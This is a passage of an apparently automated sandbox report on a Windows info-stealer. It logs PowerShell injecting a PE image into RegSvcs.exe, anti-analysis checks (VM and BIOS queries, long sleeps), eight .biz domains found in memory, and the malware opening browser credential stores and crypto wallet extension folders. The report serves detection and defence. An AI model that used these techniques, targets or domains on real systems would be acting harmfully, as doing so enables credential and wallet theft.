        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1694669351.0000022416230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1694727177.0000022416663000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAC540F push ds; retf 0_2_00007FFD9BAC5411
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAC4C00 push E8FFFFFFh; iretd 0_2_00007FFD9BAC4C0D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAC27F2 push edi; retf 0_2_00007FFD9BAC2852
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00441860 push eax; mov dword ptr [esp], 424D4C7Fh2_2_00441864
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043A6F5 push esi; retf 2_2_0043A6FE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3981Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3603Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -8301034833169293s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: RegSvcs.exe, 00000002.00000002.1827156834.00000000014DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: RegSvcs.exe, 00000002.00000002.1827156834.000000000148D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhrN
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004402D0 LdrInitializeThunk,2_2_004402D0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: powershell.exe, 00000000.00000002.1694727177.00000224167C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: truculengisau.biz
        Source: powershell.exe, 00000000.00000002.1694727177.00000224167C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: spookycappy.biz
        Source: powershell.exe, 00000000.00000002.1694727177.00000224167C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: punishzement.biz
        Source: powershell.exe, 00000000.00000002.1694727177.00000224167C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: nuttyshopr.biz
        Source: powershell.exe, 00000000.00000002.1694727177.00000224167C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: marketlumpe.biz
        Source: powershell.exe, 00000000.00000002.1694727177.00000224167C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: littlenotii.biz
        Source: powershell.exe, 00000000.00000002.1694727177.00000224167C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: grandiouseziu.biz
        Source: powershell.exe, 00000000.00000002.1694727177.00000224167C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fraggielek.biz
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 454000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 107B008Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: RegSvcs.exe, 00000002.00000002.1827156834.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
        Source: RegSvcs.exe, 00000002.00000002.1827156834.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
        Source: RegSvcs.exe, 00000002.00000002.1827156834.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: RegSvcs.exe, 00000002.00000002.1827156834.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
        Source: powershell.exe, 00000000.00000002.1728688484.00007FFD9BC90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
